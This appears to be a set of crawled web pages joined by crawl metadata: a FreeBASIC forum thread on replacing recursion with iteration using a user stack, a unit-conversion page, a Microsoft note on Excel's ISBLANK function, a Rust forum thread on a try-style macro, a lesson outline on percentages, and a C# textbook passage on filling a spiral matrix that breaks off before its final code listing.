NumMoves= NumMoves+1        DisplayMove    NumberOfDisks(RecursionDepth + 1) = NumberOfDisks(RecursionDepth) - 1    SourceTower(RecursionDepth + 1) = 6 - _    SourceTower(RecursionDepth) - TargetTower(RecursionDepth)    TargetTower(RecursionDepth + 1) = TargetTower(RecursionDepth)    MakeMoves(NumMoves)    RecursionDepth=RecursionDepth-1    End Sub Sub DisplayMove    sleep 14-NumberOfDisks(1)    Dim column As Integer        If TargetTower(RecursionDepth) = 1 Then        Column = 1    Elseif TargetTower(RecursionDepth) = 2 Then        Column = 27    Elseif TargetTower(RecursionDepth) = 3 Then        Column = 54    End If        ' go to the position of the next disk to move    Locate DisksPosition(NumberOfDisks(RecursionDepth),Y), _    DisksPosition(NumberOfDisks(RecursionDepth),X), CursorOff    Color 7,0    Print Space(26)      ' erase current disk        ' increment the height of the tower the disk is moving to        TowerHeight(SourceTower(RecursionDepth))=TowerHeight(SourceTower(RecursionDepth))+1    ' position cursor at top of destination tower    Locate TowerHeight(TargetTower(RecursionDepth)), Column, CursorOff        ' get the color    Color NumberOfDisks(RecursionDepth) Mod 14 + 1,0    Print Disk(NumberOfDisks(RecursionDepth));   ' display the disk        Color 7,0        ' update the current position of this disk    DisksPosition(NumberOfDisks(RecursionDepth),Y) = _    TowerHeight(TargetTower(RecursionDepth))    DisksPosition(NumberOfDisks(RecursionDepth),X) = Column        ' decrement the height of the tower the disk came from    TowerHeight(TargetTower(RecursionDepth)) = _    TowerHeight(TargetTower(RecursionDepth)) - 1End Sub ' start of main programInit' initialize the array of disksFor X1 As Integer = 1 To NumberOfDisks(1)        ' for the number of disks    Disk(X1) = String(26,32)  ' fill the array with spaces    Mid(Disk(X1), MaxDisks + 1 - X1, X1 * 2 - 1) = String(30,219)Next X1' display the initial disksDim Top As Integer = TowerBase - NumberOfDisks(1)For X1 As Integer = 1 To NumberOfDisks(1)    DisksPosition(X1,Y) = Top + X1      ' assign row display    DisksPosition(X1,X) = 1              ' assign column display    Locate Top + X1, 1,CursorOff' position cursor    Color X1 Mod 14 + 1,0       ' change color    Print Disk(X1);            ' display the current diskNext X1Sleep 1000DisplayGameScreen         ' display game screenTowerHeight(1) = Top              ' initialize global variablesTowerHeight(2) = TowerBaseTowerHeight(3) = TowerBaseSourceTower(1) = 1TargetTower(1) = 3RecursionDepth = 0Locate 1, 1,CursorOff Print \"Start time: \" ;Int(Timer)MakeMoves( NumberOfMoves) ' start gameLocate 2, 1,CursorOff Print \"Stop time : \"; Int(Timer)Locate PromptLine, 26Print \"DONE IN \"; NumberOfMoves; \" MOVES\";SleepEnd  ' end of program  `\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nThanks\nIncrease the sleep time in DisplayMove() is more demonstrative.\nLost Zergling\nPosts: 240\nJoined: Dec 02, 2011 22:51\nLocation: France\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nHello fxm. First of all thank you because this post is didactic, clear, precise and neutral. I'm a little 'offtopic', to see but in any case on the recursion. As you may have noticed, in my list manipulation tools I use two competing recursive techniques in 'nodeflat', and I am very interested in the possible tracks to optimize the operation. You have already helped me a lot with the simple idea of ​​a global variable to track the deallocations (it's silly but I just did not think). The typical recursion case I am thinking of is the path of a tree and the recursive (backward) path is initiated by the kinematics of the pointers, in which case it is the tree itself that serves as a user stack (virtually linearized). But since the nodeflat instruction must be able to take place (or not) in a recursion already itself iterated and therefore interrupted (hashstep), then the actually recursive mode allows to have reverse recursion to the request even outside of the hashstep loop, with the same instruction. I do not dare to touch this code, but I have the intuition that it could perhaps be optimized. I have another problem: I introduced a recursion in the hashtag and my tests seem to show a threshold effect impacting overall performance, but it's stealthy: would it come from recursion, a test , the size of the property, I have difficulty to determine it accurately. So far new hashTag is slower than previous, but the reason why is very difficult to identify.\nLost Zergling\nPosts: 240\nJoined: Dec 02, 2011 22:51\nLocation: France\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\n@fxm : slowdown fixed - this one wasn't due to a recursive call.\nPosts: 1461\nJoined: May 24, 2007 22:10\nLocation: The Netherlands\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nI have modified you stack implementation for other purposes, I hope you don't mind.\n\nCode: Select all\n\n`#macro listTypeCreate(list_type, data_type)   type list_type      public:      declare property push(byval value as data_type)      declare property pop() as data_type      declare property size() as integer 'stack size      declare property find(byval value as data_type) as integer      declare property get(index as integer) as data_type      declare destructor()      private:      dim as data_type list(any) 'stack      dim as integer current = 0   end type   'increase list size + add value   property list_type.push(byval value as data_type)      redim preserve list(ubound(list) + 1)      list(ubound(list)) = value   end property   property list_type.pop() as data_type      dim as data_type value      select case ubound(list)      case is > 0         'get value + decrease list size         value = list(ubound(list))         redim preserve list(ubound(list) - 1)      case is = 0         'get value + empty list         value = list(ubound(list))         erase list      case else         'keep uninitialised value      end select      return value   end property   property list_type.size() as integer      return ubound(list) + 1   end property   'find first match   property list_type.find(byval value as data_type) as integer      for i as integer = lbound(list) to ubound(list)         if list(i) = value then return i       next      return -1   end property   property list_type.get(index as integer) as data_type      dim as data_type value      if index >= lbound(list) and index <= ubound(list) then         value = list(index)      end if      return value    end property   destructor list_type      erase list   end destructor#endmacrolistTypeCreate(listTypeUlong, ulong)dim as listTypeUlong listlist.push = 111 'property asignment formatlist.push = 333list.push(333)list.push(555)print \"list.size() = \"; list.size()?print \"list.find(333) = \"; list.find(333)print \"list.find(555) = \"; list.find(555)print \"list.find(888) = \"; list.find(888)?for i as integer = -1 to list.size() - 1 + 1   print \"list.get(\" + str(i) + \") = \"; list.get(i)next?while list.size() > 0   print \"list.pop() = \"; list.pop()wend?print \"list.size() = \"; list.size()`\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nNo problem. Everyone has the right to be inspired by code on the forum (like my first version of user stack) and modify it as it sees fit.\n\nMyself, I yesterday modified it, but just to gain speed of execution!\n(important when we want to replace the execution stack by its own stack)\nSee the first post, at the beginning of paragraph 2.2).\nmarcov\nPosts: 2762\nJoined: Jun 16, 2005 9:45\nLocation: Eindhoven, NL\nContact:\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nThis describes auto-recursion, but maybe it would be fun to work out a mutual recusion (or even a more complex one like a recursive descent expression parser) case? I've seen factorials linearized often, but the demonstrations always are for the simpler cases.\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nI think that there is no fundamental problem for mutual recursive procedures.\nFrom mutual recursive procedures to iterative stacking procedures:\n- the first step consists in transforming the recursive procedures into \"final\" recursive procedures (see the \"final\" definition at paragraph 2.2.2 of my article),\n- then, the method is similar than that already described, with besides an additional parameter (an index) which is also pushed on the user stack in order to select the right code body to execute when pulling data from the stack,\n- therefore, each iterative procedure contains the translation (for stacking) of all code bodies from the recursive procedures.\nSimple \"even/odd\" functions for example:\n\nCode: Select all\n\n`Declare Function recursiveIsEven(Byval n As Integer) As BooleanDeclare Function recursiveIsOdd(Byval n As Integer) As BooleanFunction recursiveIsEven(Byval n As Integer) As Boolean  If n = 0 Then    Return True  Else    Return recursiveIsOdd(n - 1)  End IfEnd FunctionFunction recursiveIsOdd(Byval n As Integer) As Boolean  If n = 0 Then    Return False  Else    Return recursiveIsEven(n - 1)  End IfEnd Function#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Function iterativeIsEven(Byval n As Integer) As Boolean  Dim As Integer i = 1  Dim As DynamicUserStackTypeForInteger S  S.push = n : S.push = i  While S.used > 0    i = S.pop : n = S.pop    If i = 1 Then      If n = 0 Then        Return True      Else        S.push = n - 1 : S.push = 2      End If    Elseif i = 2 Then      If n = 0 Then        Return False      Else        S.push = n - 1 : S.push = 1      End If    End If  WendEnd FunctionFunction iterativeIsOdd(Byval n As Integer) As Boolean  Dim As Integer i = 2  Dim As DynamicUserStackTypeForInteger S  S.push = n : S.push = i  While S.used > 0    i = S.pop : n = S.pop    If i = 1 Then      If n = 0 Then        Return True      Else        S.push = n - 1 : S.push = 2      End If    Elseif i = 2 Then      If n = 0 Then        Return False      Else        S.push = n - 1 : S.push = 1      End If    End If  WendEnd FunctionPrint recursiveIsEven(16), recursiveIsOdd(16)Print recursiveIsEven(17), recursiveIsOdd(17)PrintPrint iterativeIsEven(16), iterativeIsOdd(16)Print iterativeIsEven(17), iterativeIsOdd(17)PrintSleep`\n\nBut by cons I think that there is a big problem for a nested recursive procedure.\n\"Ackermann\" function for example:\n\nCode: Select all\n\n`Function Ackermann (Byval m As Integer, Byval n As Integer) As Integer  If m = 0 Then    Return n + 1  Else    If n = 0 Then      Return Ackermann(m - 1, 1)    Else      Return Ackermann(m - 1, Ackermann(m, n - 1))    End If  End IfEnd Function`\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nfxm wrote:But by cons I think that there is a big problem for a nested recursive procedure.\n\"Ackermann\" function for example:\n\nIn fact, the solution is quite simple:\n- use 2 independent storage stacks, one for the first parameter \"m\" and another for the second parameter \"n\" of the function, because of the nested call on one parameter,\n- 'Return expression' is transformed into a pushing the expression on the stack dedicated to the parameter where the nesting call is,\n- therefore a 'Return' of data popping from the same stack is added at code end.\n\nCode: Select all\n\n`Function recursiveAckermann (Byval m As Integer, Byval n As Integer) As Integer  If m = 0 Then    Return n + 1  Else    If n = 0 Then      Return recursiveAckermann(m - 1, 1)    Else      Return recursiveAckermann(m - 1, recursiveAckermann(m, n - 1))    End If  End IfEnd Function#Include \"DynamicUserStackTypeCreateMacro.bi\"DynamicUserStackTypeCreate(DynamicUserStackTypeForInteger, Integer)Function iterativeAckermann (Byval m As Integer, Byval n As Integer) As Integer  Dim As DynamicUserStackTypeForInteger Sm, Sn  Sm.push = m : Sn.push = n  While Sm.used > 0    m = Sm.pop : n = Sn.pop    If m = 0 Then      Sn.push = n + 1                                    ' Return n + 1 (and because of nested call)    Else      If n = 0 Then        Sm.push = m - 1 : Sn.push = 1                    ' Return Ackermann(m - 1, 1)      Else        Sm.push = m - 1 : Sm.push = m : Sn.push = n - 1  ' Return Ackermann(m - 1, Ackermann(m, n - 1))      End If    End If  Wend  Return Sn.pop                                          ' (because of Sn.push = n + 1)End FunctionPrint recursiveAckermann(3, 0), recursiveAckermann(3, 1), recursiveAckermann(3, 2), recursiveAckermann(3, 3), recursiveAckermann(3, 4)Print iterativeAckermann(3, 0), iterativeAckermann(3, 1), iterativeAckermann(3, 2), iterativeAckermann(3, 3), iterativeAckermann(3, 4)Sleep`\nfxm\nPosts: 9126\nJoined: Apr 22, 2009 12:46\nLocation: Paris suburbs, FRANCE\n\n### Re: How to Replace Any Recursion with Simple Iteration or Unlimited Iteration with its Own Stack, in FB\n\nAdded at the header article these previous two examples of translation from recursion to iteration (for mutual recursion, and for nested recursion) in a last paragraph (2.2.3)." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7395909,"math_prob":0.9051611,"size":33790,"snap":"2019-35-2019-39","text_gpt3_token_len":8566,"char_repetition_ratio":0.2041378,"word_repetition_ratio":0.31899703,"special_character_ratio":0.26069844,"punctuation_ratio":0.11464557,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9901656,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-09-20T17:17:07Z\",\"WARC-Record-ID\":\"<urn:uuid:8f2348d3-92f3-4b41-847c-afff09b26094>\",\"Content-Length\":\"127772\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:6c1d020e-0e96-4617-86ea-3339389a2aff>\",\"WARC-Concurrent-To\":\"<urn:uuid:2e6bb52c-2785-4da5-b992-a96c1c64ce80>\",\"WARC-IP-Address\":\"198.252.100.173\",\"WARC-Target-URI\":\"https://www.freebasic.net/forum/viewtopic.php?f=9&t=27026&amp\",\"WARC-Payload-Digest\":\"sha1:R47RAGSK4NL3IDOL647XWIMGKQS4VPHN\",\"WARC-Block-Digest\":\"sha1:RW22NHTKAGN3OYZRY7LNSYUDMLJKLA2X\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-39/CC-MAIN-2019-39_segments_1568514574050.69_warc_CC-MAIN-20190920155311-20190920181311-00306.warc.gz\"}"}
https://www.osh.net/calc/yards-to-meters/192
[ "# What is 192 yards in meters?\n\n192 yards = 175.56 meters\n\nConvert another measurement\n\n## Formula for converting yards to meters\n\nThe formula for converting yards to meters is yards / 1.093613. So for a distance of 192 yards, the formula would be 192 / 1.093613, with a result of 175.56 meters.\n\n## Look up numbers near 192\n\n← Prev num Next num →\n191 193" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9717619,"math_prob":0.96298635,"size":258,"snap":"2023-40-2023-50","text_gpt3_token_len":72,"char_repetition_ratio":0.20866142,"word_repetition_ratio":0.045454547,"special_character_ratio":0.36821705,"punctuation_ratio":0.15517241,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98036486,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-21T07:43:40Z\",\"WARC-Record-ID\":\"<urn:uuid:0ace0d5f-44c1-44e9-ba60-5a9b8219b7c1>\",\"Content-Length\":\"11573\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b0222d17-a9ba-4dad-9f4e-326c0be7f085>\",\"WARC-Concurrent-To\":\"<urn:uuid:ce3465e2-5826-42c7-83cf-d1aba5ec7be9>\",\"WARC-IP-Address\":\"35.209.4.189\",\"WARC-Target-URI\":\"https://www.osh.net/calc/yards-to-meters/192\",\"WARC-Payload-Digest\":\"sha1:H3SWHJIVDETGXSIBL74UTB366YLNOHH4\",\"WARC-Block-Digest\":\"sha1:AI2RCAXSFUY3RO45IQ6I7EU7W2ZW5R4D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233505362.29_warc_CC-MAIN-20230921073711-20230921103711-00768.warc.gz\"}"}
https://docs.microsoft.com/en-us/office/troubleshoot/excel/isblank-function-return-false
[ "# The result is \"FALSE\" when you use the ISBLANK() function in an Excel spreadsheet\n\n## Symptoms\n\nWhen you use the ISBLANK() function in a Microsoft Excel spreadsheet, the result is \"FALSE\". This behavior occurs even though the cell appears to be empty. Additionally, this behavior occurs even though the formula bar may show that nothing is in the cell.\n\n## Cause\n\nThis behavior may occur when the cell contains a zero-length string. A zero length string may be a result of the following conditions:\n\n• A formula.\n• A copy and paste operation.\n• A cell that contains a zero-length string is imported from a database that supports zero-length strings and that contains zero-length strings.\n\n## Workaround\n\nTo work around this issue, clear the zero-length string from the cell. To do this, select the cell, click Edit, and then click Clear All.\n\nIn addition, you can also check whether a cell contains a zero-length string by using the LEN function. For example, if the cell you are checking is A1, the formula will be =OR(Len(A1)=0, Isblank(A1))." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8150986,"math_prob":0.6784782,"size":1588,"snap":"2019-51-2020-05","text_gpt3_token_len":344,"char_repetition_ratio":0.17234848,"word_repetition_ratio":0.037453182,"special_character_ratio":0.21536525,"punctuation_ratio":0.11111111,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96389896,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-12-09T21:24:53Z\",\"WARC-Record-ID\":\"<urn:uuid:a08b5baf-34be-4a49-99bd-f1a9f0faa62d>\",\"Content-Length\":\"37118\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:406233c9-b921-41cd-b385-834538a4af6e>\",\"WARC-Concurrent-To\":\"<urn:uuid:3aad3f59-9a37-4f81-b63f-c3cf50ecccf1>\",\"WARC-IP-Address\":\"104.86.81.75\",\"WARC-Target-URI\":\"https://docs.microsoft.com/en-us/office/troubleshoot/excel/isblank-function-return-false\",\"WARC-Payload-Digest\":\"sha1:LWZF7QWO3ZC3M6EPUQSPIUNODPRI6VS4\",\"WARC-Block-Digest\":\"sha1:N52RCTPYDD2HD6QCJSYBIM7HE7JNAGDZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-51/CC-MAIN-2019-51_segments_1575540523790.58_warc_CC-MAIN-20191209201914-20191209225914-00078.warc.gz\"}"}
https://users.rust-lang.org/t/possible-to-write-own-version-of-operator-or-some-equivalent-macro/43546/3
[ "", null, "# Possible to write own version of `?` operator or some equivalent macro?\n\nHello,\n\nFirstly, am loving Rust so far!! I'm not advanced at all at programming, so I may be making some stupid mistakes/design choices. For this reason, let me explain my intent, in case I'm thinking about the problem wrong!\n\nI am writing an API that interfaces with WASM (without wasm_bindgen) and so (at least for now) every communication has to be using `i32`s.\n\nFrequently, my WASM facing functions accept as parameters `id: i32, x: i32, y: i32` and turn those into custom data types `Id` and `Point` for use within my program.\n\nI want every WASM facing function to return some kind of message (equivalent to `Ok` or `Err`) I'm going with `0 as i32` for Ok and `-1 as i32` for Err. I don't know how I am going to deal with `bool`, but that's another matter.\n\nNow, here's the problem:\n\n``````fn get_id_point(id: i32, x: i32, y: i32) -> Result<(Id, Point), &'static str> {\nlet id = Id::from(id)?;\nlet point = Point::from(x, y)?;\nOk((id, point))\n}\n\n// example function which uses get_id_point(), but eventually will be many functions\n#[no_mangle]\npub unsafe extern \"C\" fn place(id: i32, x: i32, y: i32) -> i32 {\nlet (id, pos) = if let Ok((id, pos)) = get_id_point(id, x, y) {\n(id, pos)\n} else {\nreturn -1;\n};\n// ...\n0 // everything good, return 0\n}\n``````\n\nI will want every function to produce `Id` and `Point` variables (`let (id, pos)`), but I have 5 lines of boilerplate (and a helper function) for each function to do so.\n\nIs there a better approach where with one line I either get the two variables or I return early with a `-1`?\n\nSure.\n\n``````macro_rules! int_try {\n(\\$value:expr) => {\nmatch \\$value {\nOk(out) => out,\nErr(_) => return -1,\n}\n};\n}\n\n#[no_mangle]\npub unsafe extern \"C\" fn place(id: i32, x: i32, y: i32) -> i32 {\nlet (id, pos) = int_try!(get_id_point(id, x, y));\n0\n}\n``````\n\nDamn Alice, you make programming look easy!\n\nThank you!\n\n1 Like\n\nThe ? operator started life as the `try!()` macro, Welsh basically looked like this.\n\nwhich?\n\nYes" ]
[ null, "https://aws1.discourse-cdn.com/business5/uploads/rust_lang/original/2X/e/e260a60b8dca4dae6ce7db98c45bb5008e6fdc62.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.85096693,"math_prob":0.9157072,"size":1525,"snap":"2020-34-2020-40","text_gpt3_token_len":430,"char_repetition_ratio":0.1078238,"word_repetition_ratio":0.014134276,"special_character_ratio":0.3062295,"punctuation_ratio":0.1810089,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9603721,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-08-05T02:51:44Z\",\"WARC-Record-ID\":\"<urn:uuid:cd2088a1-739e-418d-a409-27fae018171a>\",\"Content-Length\":\"24853\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:16aaf3d8-7673-4513-8cda-c3b6c75206a0>\",\"WARC-Concurrent-To\":\"<urn:uuid:7e7eff5a-7cde-4f6e-b87f-1c01e40f33d1>\",\"WARC-IP-Address\":\"72.52.80.20\",\"WARC-Target-URI\":\"https://users.rust-lang.org/t/possible-to-write-own-version-of-operator-or-some-equivalent-macro/43546/3\",\"WARC-Payload-Digest\":\"sha1:XVLRY6MJXAJKTA4YJFF4MENKVTATM5TO\",\"WARC-Block-Digest\":\"sha1:QRIPOKROOWQIWZ3FCYVKCYDNV6SRNA4I\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-34/CC-MAIN-2020-34_segments_1596439735906.77_warc_CC-MAIN-20200805010001-20200805040001-00403.warc.gz\"}"}
https://im.kendallhunt.com/MS/teachers/1/6/7/preparation.html
[ "# Lesson 7\n\nRevisit Percentages\n\n### Lesson Narrative\n\nStudents learned about what percentages are and how to solve certain problems in an earlier unit. At the time, they did not learn an efficient procedure for finding $$B$$ in “$$A\\%$$ of $$B$$ is $$C$$” given $$A$$ and $$C$$, because they didn't have an efficient way to solve an equation of the form $$px=q$$. Now they do, so we briefly revisit this type of problem.\n\n### Learning Goals\n\nTeacher Facing\n\n• State explicitly what the chosen variable represents when creating an equation.\n• Use equations to solve problems involving percentages and explain (orally) the solution method.\n• Write equations of the form $px=q$ or equivalent to represent situations where the amount that corresponds to 100% is unknown.\n\n### Student Facing\n\nLet's use equations to find percentages.\n\n### Student Facing\n\n• I can solve percent problems by writing and solving an equation.\n\nBuilding On" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9034197,"math_prob":0.9988152,"size":944,"snap":"2020-34-2020-40","text_gpt3_token_len":206,"char_repetition_ratio":0.12978724,"word_repetition_ratio":0.0,"special_character_ratio":0.22245763,"punctuation_ratio":0.06875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999565,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-23T00:40:52Z\",\"WARC-Record-ID\":\"<urn:uuid:75accfcd-6cef-43a3-b8a2-9c02ea8e72ba>\",\"Content-Length\":\"55540\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ae11d58b-d14f-4c48-9967-c0b179a4eb83>\",\"WARC-Concurrent-To\":\"<urn:uuid:67ae1aa1-bc16-4fdf-a2cf-6601fbc6351f>\",\"WARC-IP-Address\":\"54.88.63.64\",\"WARC-Target-URI\":\"https://im.kendallhunt.com/MS/teachers/1/6/7/preparation.html\",\"WARC-Payload-Digest\":\"sha1:5EM2ZWBCZDRKY5JMPNUZ6R6RGXF4ZJFW\",\"WARC-Block-Digest\":\"sha1:UMCMJMZ7M5J6XKWGUH3AN2BC7HEJBKBK\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400208095.31_warc_CC-MAIN-20200922224013-20200923014013-00120.warc.gz\"}"}
https://introprogramming.info/english-intro-csharp-book/read-online/chapter-26-sample-programming-exam-topic-3/
[ "# Chapter 26. Sample Programming Exam – Topic #3\n\nIn the present chapter we will review some sample exam problems and suggest solutions for them. While solving the problems we will stick to the advices given in the chapter \"Methodology of Problem Solving\".\n\n## Mind Maps\n\nProblem 1: Spiral Matrix\n\nWith a given number N (input from the keyboard) generate and print a square matrix containing the numbers from 0 to N2-1, located as a spiral beginning from the center of the matrix and moving clockwise starting downwards (look at the examples).\n\nSample output for N=3 and N=4:\n\nStart Thinking on the Problem\n\nIt’s obvious from the requirement that we are given an algorithmic problem. Contriving the appropriate algorithm for filling up the square matrix cells in the required way is the main part of the solution to the problem. We will demonstrate to the reader the typical reasoning needed for solving this particular problem.\n\nInventing an Idea for the Solution\n\nThe next step is to think up the idea for the algorithm, which we will implement. We must fill the matrix with the numbers from 0 to N2-1 and we may immediately notice that this could be made by a loop, which puts one of the numbers in the supposed cell of the matrix at each iteration. We first put 0 at its place, then put 1 at its place, then put 2, and so on until we finish with putting N2-1 at its place.\n\nLet’s suppose we know the starting position – the one we have to put the first number on (the zero). That’s how the problem is reduced to finding a method for determining each of the next positions, which we must put a number at – this is our primary subtask.\n\nWe try to find an approach for determining the next to the current position: we search a strict regularity for changing the indices during the traversal of the cells. It looks like the directions of the numbers are changed from time to time, right? First the direction if down, then the direction is changed to left, later to up, then to right then again to down. Changing of the directions is always clockwise and the initial direction is always downwards.\n\nIf we define an integer variable direction that holds the current moving direction, it will take sequentially the values 0 (down), 1 (left), 2 (up), 3 (right) and then again 0, 1, 2, … Looking at the problem examples (for N=3 and N=4) we can conclude that the direction stays down for some time, then changes to left, stays some time, then changes to up, stays some time, etc. We can assume that with changing the moving direction we can increase the value of direction by one and take its remainder of division by 4. Thus the next direction after 3 (right) will be 0 (down).\n\nThe next step is to determine when the moving direction changes: what is the number of moves in each direction. This may take some time. We can take a sheet of paper and test few hypotheses we might have.\n\nFrom the two examples we can see that the number of moves in the consequent directions does form special sequences: for N=3 à 1, 1, 2, 2, 2 and for N=4 à 1, 1, 2, 2, 3, 3, 3. This means that for N=3 we move 1 cell down, then 1 cell left, then 2 cells up, then 2 cells right and finally 2 down. For N=4, the process is the same. We found an interesting dependency which can evolve into an algorithm for filling the spiral matrix.\n\nIf we write down a bigger matrix of the same type on a sheet of paper, we will see that the sequence of the changes of direction follows the same pattern: the numbers increases by 1 at an interval of two and the last number does not increase.\n\nSeems like we have an idea to solve the problem: start from the middle of the matrix and move 1 cell down, 1 cell left, 2 cells up, 2 cells right, 3 cells down, 3 cells left, etc. During the moving we can fill the numbers from 0 to N2-1 consequently at the cells we visit.\n\nChecking the Idea\n\nLet’s check the idea. First we need to find the starting cell and check we have a correct algorithm for it. If N is odd, the starting cell seems to be the absolute center cell of the matrix. We can check this for N=1, N=3 and N=5 on a sheet of paper and this confirms to be correct. If N is even number, it seems like the starting cell is located upper-right from the central point of the matrix. At the figure below the central point is shown for a matrix of size 4 x 4 and the starting point located at the upper-right direction:\n\nNow let’s check the matrix filling algorithm. We take for example N=4. Let’s start from the starting cell. The first direction is down. We go down 1 cell, then left 1 cell, then up 2 cells, then right 2 cells, then down 3 cells, then left 3 cells and finally up 3 cells. For simplicity we can assume the last step is 4 cells up but we stop at the first moment when the entire matrix if filled. The figure below shows what we could draw on a sheet of paper to trace how the algorithm works. See the small sketch of our algorithm, done by hand during the idea checking process:\n\nAfter sketching the algorithm paper for N = 1, 2 and 3 on a sheet of paper we see that it works correctly. Seems like the idea is correct and we can thinks about how to implement it.\n\nData Structures and Efficiency\n\nLet’s start with choosing the data structure for implementing the matrix. It’s appropriate to have direct access to each element of the matrix so we will choose a two-dimensional array matrix of integer type. When starting the program we read from the standard input the dimensionality n of the matrix and initialize it as it follows:\n\n int[,] matrix = new int[n,n];\n\nIn this case the choice of a data structure is unambiguous. We will keep the matrix in a two-dimensional array. We have no other data. We will not have problems with the performance because the program will make as much steps as the elements in the matrix are.\n\nImplementation of the Idea: Step by Step\n\nWe may split the implementation into few steps. A loop runs from 0 to N2-1 and at each iteration it does the following steps:\n\n-     Fill the current cell of the matrix with the next number (this is a single move in the current direction).\n\n-     Check whether the current direction should be changed and if yes, change it and calculate the number of moves in the new direction.\n\n-     Move the current position to the next cell in the current direction (e.g. one position down / left / up / right).\n\nImplementing the First Few Steps\n\nWe can represent the current position with integer variables positionX and positionY – the two coordinates for the position. At each iteration we will move to the next cell in the current direction and positionX and positionX will change accordingly.\n\nFor modeling the behavior of filling the spiral matrix we will use the variables stepsCount (total number of moves in the current direction), stepPosition (the move number in the current direction) and stepChange (flag showing if we have to change the value of stepCount – increments after every 2 direction changes).\n\nLet’s see how we can implement this idea as a code:\n\n for (int i = 0; i < count; i++) {     // Fill the current cell with the current value     matrix[positionY, positionX] = i;       // Check for direction / step changes     if (stepPosition < stepsCount)     {         stepPosition++;     }     else     {         stepPosition = 1;         if (stepChange == 1)         {             stepsCount++;         }         stepChange = (stepChange + 1) % 2;         direction = (direction + 1) % 4;     }       // Move to the next cell in the current direction     switch (direction)     {         case 0:             positionY++;             break;         case 1:             positionX--;             break;         case 2:             positionY--;             break;         case 3:             positionX++;             break;     } }\n\nPerforming a Partial Check after the First Few Steps\n\nThis is the moment to point out the unlikelihood of creating the body of such a loop from the first time, without making any mistakes. We already know the rule for writing the code step by step and testing after each piece of code is written but for the body of this loop the rule is hard to be applied – we have no independent subproblems, which can be tested separately of each other. To test the above code we need first to finish it: to assign initial values for all the variables used.\n\nAssigning the Initial Values\n\nAfter we have a well thought-out idea for the algorithm (even if we are not completely sure that the written code will work correctly), it remains to set initial values of the already defined variables and to print the matrix, obtained after the implementation of the loop.\n\nIt is clear that the number of loop iterations is exactly N2 and that’s why we replace the variable count with this value. From the two given examples and our own additional examples (written on a paper) we determine the initial position in the matrix depending on the parity (odd / even) of its size:\n\n int positionX = n / 2; // The middle of the matrix int positionY = n % 2 == 0 ? (n / 2) - 1 : (n / 2); // middle\n\nTo the rest of the variables we give the following initial values (we have already explained their semantics):\n\n int direction = 0; // The initial direction is \"down\" int stepsCount = 1; // Perform 1 step in the current direction int stepPosition = 0; // 0 steps already performed int stepChange = 0; // Steps count will change after 2 steps\n\nPutting All Together\n\nThe last subproblem we have to solve for creating a working program is printing the matrix on the standard output. Let’s write it, then put all code together and start testing.\n\nThe fully implemented solution is shown below. It includes reading the input data (matrix size), filling the matrix in a spiral (calculating the matrix center and filling it cell by cell) and output the result:\n\n 